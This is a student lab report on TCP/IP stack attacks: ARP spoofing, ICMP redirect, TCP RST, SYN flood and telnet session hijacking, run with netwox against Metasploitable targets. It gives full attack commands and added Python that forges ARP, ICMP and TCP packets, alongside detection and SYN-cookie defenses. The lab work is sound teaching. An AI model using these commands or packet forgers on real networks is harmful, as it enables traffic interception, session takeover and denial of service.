20199106 2019-2020-2 "Network Attack and Defense Practice" Week 5 Assignment

Assignment description

This assignment belongs to the course: Network Attack and Defense Practice
Where the assignment requirement is: Week 5 assignment: network sniffer and protocol analyzer
My goal for this course: to gain a fairly comprehensive understanding of network attack and defense technology and to master basic offensive and defensive operations.
Which aspects of this assignment helped me reach that goal: hands-on practice of the principles and practice of TCP/IP network protocol attacks

Assignment text

Practice content

Chapter 5 describes the various attacks on the TCP/IP network protocol stack.

Overview :

  • Five security attributes of network security: confidentiality, integrity, availability, authenticity and non-repudiation.
    • Four basic modes of network attack: interception, interruption, tampering, forgery.
    • Security flaws of the TCP/IP protocol stack:
      • Network interface layer: with the Ethernet protocol, a network interface in promiscuous mode can intercept and sniff packets directly, and because the source MAC address is never authenticated, MAC address spoofing is possible.
      • Internet layer: the IP protocol forwards on the destination address only and does not check whether the source IP address is genuine, so it is vulnerable to IP spoofing. Other flaws include source routing abuse, IP fragmentation attacks, ARP spoofing, ICMP redirects and the Smurf attack.
      • Transport layer: once a TCP session has been established it is very vulnerable to forgery and spoofing; an attacker can tear the session down directly with a TCP RST attack. The design of the TCP three-way handshake also lets an attacker mount a SYN flood attack.
      • Application layer: popular application-layer protocols such as HTTP, FTP, POP3/SMTP and DNS lack security in their design.

Network layer attacks and countermeasures

  • IP source address spoofing
    • Principle: routers forward packets by destination address only and never verify that the source address is genuine.
    • Attack process:
    • Attack tools: netwox, wireshark, nmap
    • Precautions: use randomized initial sequence numbers, use network-layer security protocols, avoid trust policies based on IP addresses, implement packet filtering on routers and gateways.
  • ARP spoofing attack
    • Principle: ARP was designed on the assumption that every host inside the LAN is trustworthy, which makes it very easy to inject a forged IP-to-MAC mapping into a victim's ARP cache.
    • Attack process:
    • Attack tools: arpspoof from DSniff, Arpoison, Ettercap, Netwox.
    • Precautions: statically bind the IP-to-MAC mappings of key hosts, use the corresponding ARP defense tools, segment the network topology with virtual subnets, encrypt transmissions.
  • ICMP route redirect attack
    • Principle: use ICMP redirect messages to change the routing table of the victim host. The attacker sends a redirect to the target host while impersonating the router, so the target's packets are sent to the attack machine, which can then monitor them.
    • Attack process:
    • Tools: netwox
    • Precautions: filter certain types of ICMP packets, configure firewall filtering, and check whether an ICMP redirect message really comes from the local router.
  • Transport layer protocol attacks and preventive measures
    • TCP RST attack
      • Principle: the TCP header carries an RST (reset) flag; when a host receives a segment with the flag set to 1 it immediately tears down the TCP session. A forged TCP reset segment can therefore close a TCP session directly.
      • Attack process:
      • Tools: netwox
    • TCP session hijacking attack
      • Principle: TCP session hijacking takes over a TCP session the two parties have already established and impersonates one party to continue communicating with the other. The core issue is how TCP authenticates the communicating party: only by the session's sequence and acknowledgement numbers.
      • Attack process:
      • Precautions: disable source routing on hosts, use static IP and IP-to-MAC mapping tables to avoid ARP spoofing, and filter ICMP redirect messages
    • TCP SYN flood denial-of-service attack
      • Principle: exploiting a flaw in the TCP three-way handshake, the attacker sends the target host a large number of SYN connection requests with forged source addresses; these exhaust the target host's connection queue so that it can no longer serve normally.
      • Attack process:
      • Precautions: SYN cookies (no resources are allocated until the handshake information has arrived in full); firewall address state monitoring (the state of each TCP connection to the target server is classified as NEW, GOOD or BAD).
    • UDP flood denial-of-service attack
      • Principle: send a large number of UDP packets to the target host and network, causing a heavy processing load on the target host or congesting the network, so that the target host and network become unusable: a denial of service.
      • Precautions: disable or filter monitoring and response services, and disable or filter other UDP services.

Experiment procedure

Experimental task

In the network attack and defense lab environment (with SEED_VM as the attack machine and Linux Metasploitable / Windows Metasploitable as the targets), complete the TCP/IP protocol stack attack experiments, including ARP cache spoofing, ICMP redirect, SYN flood, TCP RST and TCP session hijacking (bonus).

Lab environment

Lab environment                  IP address         MAC address
Target A: WinXP                  192.168.200.3      00:0C:29:03:4F:2D
Target B: Linux Metasploitable   192.168.200.125    00:0c:29:0c:64:32
Attack machine C: Kali           192.168.200.2      00:0c:29:7e:33:d5

1. ARP cache spoofing attack

First install netwox on Kali with apt-get install netwox.
On the attack machine run netwox, choose 5 -> 33, i.e. netwox 33 -b 00:0C:29:03:4F:2D -g 192.168.200.125 -h 00:0C:29:03:4F:2D -i 192.168.200.2

Note:
Tool 33 can construct an arbitrary Ethernet ARP packet, and tool 80 can periodically send ARP reply packets; either tool can be used for an ARP attack.
netwox 33 -b (A's MAC address) -g (B's IP address) -h (A's MAC address) -i (A's IP address); these options fill in the Ethernet and ARP address fields of the forged reply, and the tool's own help text lists exactly which field each letter sets (note that the command as run above passes 192.168.200.2, C's address, to -i).

The command runs as follows:

On target A run arp -a: the ARP cache of target host A now stores the mapping IP(B) / MAC(C), so the deception has succeeded.

Deceive B in the same way; open Wireshark on Kali and the traffic between A and B can be seen captured on host C, showing that ARP spoofing has succeeded.
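The frame that tool 33 puts on the wire in this step, and the check that the "static binding" precaution from the summary amounts to, as an added example that is not part of the original post. Addresses are the ones in the lab table; the monitor's static IP/MAC table and the sample frames are constructed for the example, and the code does not rely on any particular mapping of netwox's option letters.

```python
"""Forge an unsolicited ARP reply (what netwox 33 sends in step 1) and detect
cache poisoning by checking replies against static IP/MAC bindings.
Added example; the STATIC_TABLE and sample frames are constructed."""
import struct

ETH_TYPE_ARP = 0x0806
ARP_REPLY = 2

# Lab hosts from the table above.
A_IP, A_MAC = "192.168.200.3", "00:0c:29:03:4f:2d"
B_IP, B_MAC = "192.168.200.125", "00:0c:29:0c:64:32"
C_IP, C_MAC = "192.168.200.2", "00:0c:29:7e:33:d5"


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(eth_src, eth_dst, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an ARP reply (opcode 2).

    A host that already holds sender_ip in its cache overwrites the entry
    with sender_mac without asking; that is the whole attack.
    """
    eth = mac_bytes(eth_dst) + mac_bytes(eth_src) + struct.pack("!H", ETH_TYPE_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, op=2
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet/ARP frame, or None if it is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    return {
        "eth_src": mac_str(frame[6:12]),
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


def poisoned_entry(frame):
    """The (ip, mac) pair the victim's cache learns from this frame."""
    p = parse_arp(frame)
    return (p["sender_ip"], p["sender_mac"]) if p else None


def detect_spoof(frames, static_table):
    """Flag ARP replies whose sender IP is a protected host but whose claimed
    MAC, or the Ethernet source of the frame itself, differs from the binding."""
    alerts = []
    for f in frames:
        p = parse_arp(f)
        if not p or p["op"] != ARP_REPLY:
            continue
        known = static_table.get(p["sender_ip"])
        if known and (p["sender_mac"] != known or p["eth_src"] != known):
            alerts.append((p["sender_ip"], known, p["sender_mac"]))
    return alerts


# Poison A: "B's IP lives at C's MAC", sent by C directly to A.
SPOOF_A = build_arp_reply(C_MAC, A_MAC, C_MAC, B_IP, A_MAC, A_IP)
# Poison B the same way: "A's IP lives at C's MAC".
SPOOF_B = build_arp_reply(C_MAC, B_MAC, C_MAC, A_IP, B_MAC, B_IP)
# A genuine reply from B to A, for comparison.
GENUINE = build_arp_reply(B_MAC, A_MAC, B_MAC, B_IP, A_MAC, A_IP)

STATIC_TABLE = {A_IP: A_MAC, B_IP: B_MAC}  # assumed bindings kept by the monitor

if __name__ == "__main__":
    print("A's cache now maps", poisoned_entry(SPOOF_A))
    for ip, good, bad in detect_spoof([GENUINE, SPOOF_A, SPOOF_B], STATIC_TABLE):
        print("ALERT: %s is bound to %s but a reply claims %s" % (ip, good, bad))
```

The detector checks the Ethernet source as well as the ARP sender field because a forger controls both, but a static binding fixes the one address the victim must trust; on the hosts themselves the same effect comes from a static ARP entry (arp -s) for the gateway and peers.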

2. ICMP route redirect attack

This is generally combined with IP source address spoofing. On the attack machine use Netwox tool 86; the attack command is netwox 86 -f "host 192.168.200.3" -g 192.168.200.2 -i 192.168.200.1, where -f is the filter selecting the target host, -g is the next-hop address the target is redirected to, and -i is the forged source identity (the gateway's address).

Let the target visit any web page and compare the victim host's routing table before and after the ICMP redirect attack: the attack machine's IP address now appears in it, as shown below:

So the attack machine has successfully impersonated the gateway's IP address.
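The redirect message tool 86 sends here, and the host-side checks behind the precaution "verify that the redirect comes from the local router", as an added example that is not from the original post. The victim and attacker addresses are from the lab table; the gateway 192.168.200.1 is the one the command above spoofs, while its MAC, the netmask, a second router and the web server address are constructed for the example.

```python
"""Build an ICMP redirect (type 5, code 1) as in step 2 and evaluate it the
way a careful host should. Added example; GW_MAC, NETMASK, ROUTER2 and WEB
are assumptions."""
import struct

ICMP_REDIRECT, REDIRECT_HOST = 5, 1

GW_IP, GW_MAC = "192.168.200.1", "00:00:5e:00:01:01"   # real gateway (MAC assumed)
A_IP, A_MAC = "192.168.200.3", "00:0c:29:03:4f:2d"     # victim
C_IP, C_MAC = "192.168.200.2", "00:0c:29:7e:33:d5"     # attacker, the new "gateway"
ROUTER2, WEB, NETMASK = "192.168.200.254", "198.51.100.80", "255.255.255.0"


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))

def ip_str(b):
    return ".".join(str(x) for x in b)

def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))

def mac_str(b):
    return ":".join("%02x" % x for x in b)

def checksum(data):
    """RFC 1071 one's-complement sum; verifies to 0 over a correct header."""
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF

def ipv4_header(src, dst, proto, payload_len, ttl=64):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0,
                      ttl, proto, 0, ip_bytes(src), ip_bytes(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]

def build_redirect(eth_src, eth_dst, src_ip, victim_ip, new_gw, orig_dst):
    """Ethernet + IPv4 + ICMP redirect. The ICMP body quotes the IP header of
    the victim's own packet to orig_dst plus 8 bytes, as a real router would."""
    quoted = ipv4_header(victim_ip, orig_dst, 6, 20) + b"\x00" * 8
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, REDIRECT_HOST, 0, ip_bytes(new_gw)) + quoted
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    eth = mac_bytes(eth_dst) + mac_bytes(eth_src) + struct.pack("!H", 0x0800)
    return eth + ipv4_header(src_ip, victim_ip, 1, len(icmp)) + icmp

def parse_redirect(frame):
    """Fields a host needs to decide; None if the frame is not an ICMP redirect."""
    if struct.unpack("!H", frame[12:14])[0] != 0x0800 or frame[23] != 1:
        return None
    icmp = frame[34:]
    if icmp[0] != ICMP_REDIRECT:
        return None
    return {"eth_src": mac_str(frame[6:12]), "src_ip": ip_str(frame[26:30]),
            "dst_ip": ip_str(frame[30:34]), "new_gw": ip_str(icmp[4:8]),
            "quoted_src": ip_str(icmp[20:24]), "quoted_dst": ip_str(icmp[24:28]),
            "icmp_ok": checksum(icmp) == 0}

def same_subnet(a, b, mask):
    return all((x & m) == (y & m) for x, y, m in zip(ip_bytes(a), ip_bytes(b), ip_bytes(mask)))

def evaluate_redirect(frame, my_ip, gw_ip, gw_mac, mask):
    """(accept, reason). The IP-level rules are what 'comes from the local
    router' means; the final MAC comparison is what actually stops a redirect
    whose IP source has been forged, as in the netwox 86 command."""
    r = parse_redirect(frame)
    if r is None:
        return False, "not an ICMP redirect"
    if not r["icmp_ok"]:
        return False, "bad ICMP checksum"
    if r["dst_ip"] != my_ip or r["quoted_src"] != my_ip:
        return False, "does not concern a packet I sent"
    if r["src_ip"] != gw_ip:
        return False, "not from my current gateway"
    if not same_subnet(r["new_gw"], my_ip, mask):
        return False, "new gateway is not on-link"
    if r["eth_src"] != gw_mac:
        return False, "IP source is the gateway but frame came from " + r["eth_src"]
    return True, "route %s via %s" % (r["quoted_dst"], r["new_gw"])

# C impersonates the gateway's IP and points A at itself.
ATTACK = build_redirect(C_MAC, A_MAC, GW_IP, A_IP, C_IP, WEB)
# A genuine redirect from the real gateway to a second on-link router.
LEGIT = build_redirect(GW_MAC, A_MAC, GW_IP, A_IP, ROUTER2, WEB)

if __name__ == "__main__":
    for name, f in (("attack", ATTACK), ("legit", LEGIT)):
        print(name, evaluate_redirect(f, A_IP, GW_IP, GW_MAC, NETMASK))
```

Note the limit of the IP-level check: the forged message passes it because its source address is the gateway's and the new gateway (C) is on-link; only the Ethernet source, or a known gateway MAC, gives it away. In practice hosts simply refuse redirects altogether (on Linux, sysctl net.ipv4.conf.all.accept_redirects=0), which is the safer precaution.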

3. TCP RST attack

• Before the attack, log in to host B from host A: telnet 192.168.200.125. On C use Netwox tool 78 ("Reset every TCP packet") to carry out the TCP RST attack: netwox 78 -i 192.168.200.125. Back on host A, type any command and press Enter; A and B are found to be disconnected:

Open Wireshark on C to view the capture: C, impersonating B, sends RST segments to A, which tears down the connection between A and B:

4. SYN flood attack

First log in to B from A with telnet so that a connection is established;
on C choose tool 76 "synflood" and enter the destination address: 192.168.200.125;

Open Wireshark on C: the attack machine C can be seen sending a large number of forged SYN connection requests to the IP of target B.

Looking at the telnet session just opened on A, no disconnection was found, probably because target B is more powerful?
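SYN cookies, the first precaution the summary lists for the SYN flood, applied to the traffic of this step, as an added example that is not from the original post. The listener keeps no state for half-open connections, so the forged SYNs that tool 76 sends cost it nothing but one reply each. The cookie layout follows the Linux scheme in spirit (an 8-bit counter and a 24-bit keyed hash carrying an MSS index) but is simplified; the secret, counter, MSS table and client addresses are constructed.

```python
"""Stateless SYN handling with SYN cookies. Added example; the secret key,
counter advance, MSS table and all addresses are constructed for it."""
import hashlib
import hmac
import random
import struct

MSS_TABLE = (536, 1300, 1440, 1460)   # the MSS values a 2-bit index can encode


def _h(secret, src_ip, dst_ip, sport, dport, count):
    """24-bit keyed hash of the 4-tuple and the counter."""
    msg = src_ip.encode() + dst_ip.encode() + struct.pack("!HHB", sport, dport, count)
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")


def mss_index(mss):
    idx = 0
    for i, m in enumerate(MSS_TABLE):
        if m <= mss:
            idx = i
    return idx


def make_cookie(secret, src_ip, dst_ip, sport, dport, client_isn, mss, count):
    """Server ISN = client_isn + (count << 24) + 24-bit (hash + MSS index)."""
    count &= 0xFF
    data = (_h(secret, src_ip, dst_ip, sport, dport, count) + mss_index(mss)) & 0xFFFFFF
    return (client_isn + (count << 24) + data) & 0xFFFFFFFF


def check_cookie(secret, src_ip, dst_ip, sport, dport, client_isn, cookie, now_count, max_age=1):
    """Recover the MSS from a returned cookie; None if it is forged or stale."""
    diff = (cookie - client_isn) & 0xFFFFFFFF
    count = diff >> 24
    if (now_count - count) & 0xFF > max_age:
        return None
    idx = (diff - _h(secret, src_ip, dst_ip, sport, dport, count)) & 0xFFFFFF
    return MSS_TABLE[idx] if idx < len(MSS_TABLE) else None


class Server:
    """Listener (B:23 in the lab) that answers every SYN without storing it."""

    def __init__(self, ip, port, secret):
        self.ip, self.port, self.secret = ip, port, secret
        self.count = 0          # Linux bumps this every 64 s; here via tick()
        self.established = {}   # only completed handshakes get state

    def tick(self):
        self.count = (self.count + 1) & 0xFF

    def on_syn(self, src_ip, sport, client_isn, mss):
        """Return (seq, ack) of the SYN-ACK to send. Nothing is remembered."""
        cookie = make_cookie(self.secret, src_ip, self.ip, sport, self.port,
                             client_isn, mss, self.count)
        return cookie, (client_isn + 1) & 0xFFFFFFFF

    def on_ack(self, src_ip, sport, seq, ack):
        """Third handshake segment: seq = client_isn + 1, ack = cookie + 1."""
        client_isn = (seq - 1) & 0xFFFFFFFF
        mss = check_cookie(self.secret, src_ip, self.ip, sport, self.port,
                           client_isn, (ack - 1) & 0xFFFFFFFF, self.count)
        if mss is None:
            return False
        self.established[(src_ip, sport)] = mss
        return True


def flood(server, n, rng):
    """n SYNs from random spoofed sources, never completed (what tool 76 does)."""
    for _ in range(n):
        src = "%d.%d.%d.%d" % tuple(rng.randrange(1, 255) for _ in range(4))
        server.on_syn(src, rng.randrange(1024, 65535), rng.getrandbits(32), 1460)
    return len(server.established)


def legit_handshake(server, src_ip, sport, client_isn=12345, mss=1460):
    """A real client completes the handshake even if the counter moved once."""
    seq, ack = server.on_syn(src_ip, sport, client_isn, mss)
    server.tick()
    return server.on_ack(src_ip, sport, ack, (seq + 1) & 0xFFFFFFFF)


if __name__ == "__main__":
    s = Server("192.168.200.125", 23, b"constructed-secret")
    print("state entries after 10000 spoofed SYNs:", flood(s, 10000, random.Random(1)))
    print("A connects:", legit_handshake(s, "192.168.200.3", 1069), s.established)
```

The cost of the scheme is visible in the code: TCP options other than the MSS are lost because the server only has 24 bits to remember anything, which is why Linux enables cookies only once the SYN backlog overflows (net.ipv4.tcp_syncookies=1).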

5. TCP session hijacking attack

First log in to B from A with telnet; open Wireshark on C and enter the filter telnet, then type the command pwd on A. In Wireshark on C, in the second pane, the p, w, d packets appear under telnet.

Select the last packet and open Transmission Control Protocol to read the following values: source port, destination port, Next Seq Num and ACK.

With this information the attack machine C uses netwox to send B a forged TCP segment that appears to come from A. Once it is sent, the original A loses the connection while B treats Kali as the visitor, achieving session hijacking.
The command is as follows:
netwox 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.200.3 --ip4-dst 192.168.200.125 --tcp-src 1069 --tcp-dst 23 --tcp-seqnum 1387 --tcp-acknum 104 --tcp-ack --tcp-psh --tcp-window 64 --tcp-data "6D6B646972206161"
After --ip4-src enter A's address and after --ip4-dst enter B's address; --tcp-src is the original source port number (which varies); enter the Next Seq Num and ACK values noted above as --tcp-seqnum and --tcp-acknum; --tcp-data is the data C sends, as a hexadecimal value, here the hex encoding of mkdir aa. The same value can be observed being transmitted in Wireshark.

So the attack machine C, impersonating A's IP, has successfully sent a segment to B.
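The segments forged in step 3 (the RST) and step 5 (the PSH/ACK that the netwox 40 command above builds), together with the acceptability check on B's side that decides their fate, as an added example that is not from the original post. Addresses, ports, sequence numbers and the "mkdir aa" payload are the values from step 5; the receive window, B's next send sequence number, and the simplified RFC 793 receiver model are assumptions.

```python
"""Forge IPv4/TCP segments with valid checksums and model how the receiver
treats them. Added example; the Receiver class, its window size and the
sample follow-up segment from A are constructed."""
import struct

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10
A_IP, B_IP = "192.168.200.3", "192.168.200.125"
A_PORT, TELNET = 1069, 23


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def checksum(data):
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def build_tcp(src_ip, dst_ip, sport, dport, seq, ack, flags, payload=b"", window=64, ttl=64):
    """IPv4 + TCP segment; the fields mirror the --ip4-*/--tcp-* options of netwox 40."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0) + payload
    pseudo = ip_bytes(src_ip) + ip_bytes(dst_ip) + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000,  # 0x4000: don't fragment
                     ttl, 6, 0, ip_bytes(src_ip), ip_bytes(dst_ip))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def parse_tcp(pkt):
    ihl = (pkt[0] & 0x0F) * 4
    src, dst, t = pkt[12:16], pkt[16:20], pkt[ihl:]
    sport, dport, seq, ack, off, flags, win = struct.unpack("!HHIIBBH", t[:16])
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(t))
    return {"src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)),
            "sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags,
            "data": t[(off >> 4) * 4:], "tcp_csum_ok": checksum(pseudo + t) == 0,
            "ip_csum_ok": checksum(pkt[:ihl]) == 0}


def next_seq(sniffed_seq, sniffed_len):
    """Wireshark's 'Next Seq Num' for the last segment A sent."""
    return (sniffed_seq + sniffed_len) & 0xFFFFFFFF


class Receiver:
    """B's side of the established telnet session, as a minimal TCB."""

    def __init__(self, rcv_nxt, snd_nxt, rcv_wnd=4096):
        self.rcv_nxt, self.snd_nxt, self.rcv_wnd = rcv_nxt, snd_nxt, rcv_wnd
        self.state, self.received = "ESTABLISHED", b""

    def deliver(self, pkt):
        """'reset', 'accepted', 'out-of-order', 'bad-ack' or 'dropped'."""
        s = parse_tcp(pkt)
        if self.state != "ESTABLISHED" or not (s["tcp_csum_ok"] and s["ip_csum_ok"]):
            return "dropped"
        if (s["src"], s["sport"], s["dst"], s["dport"]) != (A_IP, A_PORT, B_IP, TELNET):
            return "dropped"                       # not this connection
        if ((s["seq"] - self.rcv_nxt) & 0xFFFFFFFF) >= self.rcv_wnd:
            return "dropped"                       # outside the receive window
        if s["flags"] & RST:                       # in-window RST kills the session
            self.state = "CLOSED"
            return "reset"
        if 0 < ((s["ack"] - self.snd_nxt) & 0xFFFFFFFF) < 0x80000000:
            return "bad-ack"                       # acknowledges data never sent
        if s["seq"] != self.rcv_nxt:
            return "out-of-order"
        self.received += s["data"]
        self.rcv_nxt = (self.rcv_nxt + len(s["data"])) & 0xFFFFFFFF
        return "accepted"


# The netwox 40 segment from step 5 and a netwox 78 style reset with the same numbers.
HIJACK = build_tcp(A_IP, B_IP, A_PORT, TELNET, 1387, 104, ACK | PSH, bytes.fromhex("6D6B646972206161"))
RESET = build_tcp(A_IP, B_IP, A_PORT, TELNET, 1387, 0, RST)
# A's own next keystrokes, still numbered from 1387 (constructed).
A_NEXT = build_tcp(A_IP, B_IP, A_PORT, TELNET, 1387, 104, ACK | PSH, b"ls\r\n")


def run_hijack():
    b = Receiver(rcv_nxt=1387, snd_nxt=104)
    r1 = b.deliver(HIJACK)   # B runs "mkdir aa" and moves rcv_nxt to 1395
    r2 = b.deliver(A_NEXT)   # A's real data now looks old to B
    return r1, r2, b.received, b.rcv_nxt


def run_reset():
    b = Receiver(rcv_nxt=1387, snd_nxt=104)
    return b.deliver(RESET), b.deliver(A_NEXT)


def run_blind_reset():
    """A RST whose sequence number was guessed, not sniffed."""
    b = Receiver(rcv_nxt=1387, snd_nxt=104)
    return b.deliver(build_tcp(A_IP, B_IP, A_PORT, TELNET, 9999999, 0, RST))


if __name__ == "__main__":
    print("hijack:", run_hijack())
    print("reset:", run_reset(), "blind reset:", run_blind_reset())
```

The model shows why both attacks need the sniffed numbers: a reset or injected segment is only honoured inside the receive window, which is what tool 78 obtains by reading each live segment before answering it, and it shows why A "loses the connection" after the injection, since its genuine data now falls before B's advanced rcv_nxt and is silently discarded.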

Problems encountered in learning and solutions

Problem one: the virtual machine always reported insufficient memory on boot.

Solution: after a few tries it just worked; I also tried changing the virtual machine's memory a bit, but the effect was not obvious.

Problem two: installing netwox failed.

Solution: the Kali attack machine was not connected to the network.

Feelings and learning experience

Apart from some problems at the beginning of the experiment with the virtual machine and the virtual network being turned on, the rest went quite well; thanks to my classmates for their help.

Reference material

"Network Attack and Defense Technology and Practice", Jianwei Zhuge

"How to view the MAC address on WinXP"

"ARP", Baidu Encyclopedia

Source: www.cnblogs.com/wyrr/p/12616557.html